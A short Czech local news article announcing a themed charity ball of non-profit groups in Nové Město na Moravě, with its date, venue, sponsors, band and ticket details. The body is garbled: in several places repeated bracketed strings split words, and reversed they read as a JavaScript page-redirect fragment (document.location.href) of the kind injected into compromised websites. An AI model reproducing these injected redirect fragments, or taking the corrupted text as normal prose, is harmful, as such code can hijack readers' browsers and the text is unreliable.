Rainbow page separator

Ples neziskových organizací Spolubál bude ve znamení živlů

Pondělí, 8. listopadu 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Tradiční ples neziskových organizací ze Žďárska a Novoměstska s názvem Spolubál se le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos odehraje ve znamení živlů. Pod zášti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou Sdružení Krajina, Domácího hospice Vysočina, Maracaiba, novoměstských důchodců, Popálek, Základní školy Na Radosti, Tělovýchovné jednoty Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě, Portima, Novoměstských sociálních služeb a Základní školy Spolu se odehraje v pátek 12. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu od půl osmé večer v novoměstském kulturním domě. Finančně akci podpořila taktéž tamní radnice.
Co se plesové garderoby týče, doporučeny jsou oděvní doplňky evokující energii vody, větru, ohně či země. K tanci i poslechu zahraje kapela The People, chybět nebude ani improvizovaná kavárna se živým hudebním doprovodem.
Vstupenky na Spolubál je možné za 250 korun zakoupit buď v on-line předprodeji na smsticket.cz, případně v novoměstském informačním centru na náměstí.